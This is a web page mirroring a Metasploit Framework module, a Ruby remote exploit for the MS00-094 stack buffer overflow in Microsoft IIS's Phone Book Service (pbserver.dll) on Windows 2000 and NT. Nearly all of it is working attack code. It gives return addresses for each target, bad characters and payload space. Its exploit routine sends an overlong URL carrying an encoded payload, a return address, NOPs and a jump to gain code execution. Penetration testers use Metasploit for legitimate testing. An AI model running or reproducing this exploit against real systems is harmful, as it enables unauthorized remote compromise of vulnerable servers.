Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/isapi/ms00_094_pbserver.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'MS00-094 Microsoft IIS Phone Book Service Overflow',

16
        'Description' => %q{

17
          This is an exploit for the Phone Book Service /pbserver/pbserver.dll

18
          described in MS00-094. By sending an overly long URL argument

19
          for phone book updates, it is possible to overwrite the stack. This

20
          module has only been tested against Windows 2000 SP1.

21
        },

22
        'Author' => [ 'aushack' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2000-1089' ],

26
          [ 'OSVDB', '463' ],

27
          [ 'BID', '2048' ],

28
          [ 'MSB', 'MS00-094' ],

29
        ],

30
        'Privileged' => false,

31
        'DefaultOptions' => {

32
          'EXITFUNC' => 'thread',

33
        },

34
        'Payload' => {

35
          'Space' => 896,

36
          'BadChars' => "\x00\x0a\x0d\x20%&=?",

37
          'StackAdjustment' => -3500,

38
        },

39
        'Platform' => 'win',

40
        'Targets' => [

41
          ['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll

42
          ['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll

43
          ['Windows NT SP6', { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll

44
        ],

45
        'DisclosureDate' => '2000-12-04',

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]),

58
      ]

59
    )

60
  end

61


62
  def check

63
    print_status("Requesting the vulnerable ISAPI path...")

64
    res = send_request_raw({

65
      'uri' => normalize_uri(datastore['URL'])

66
    }, 5)

67


68
    if (res and res.code == 400)

69
      return Exploit::CheckCode::Detected

70
    end

71


72
    return Exploit::CheckCode::Safe

73
  end

74


75
  def exploit

76
    print_status("Sending overflow...")

77


78
    res = send_request_raw({

79
      'uri' => normalize_uri(datastore['URL']) + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)

80
    }, 5)

81


82
    handler

83
  end

84
end

85


86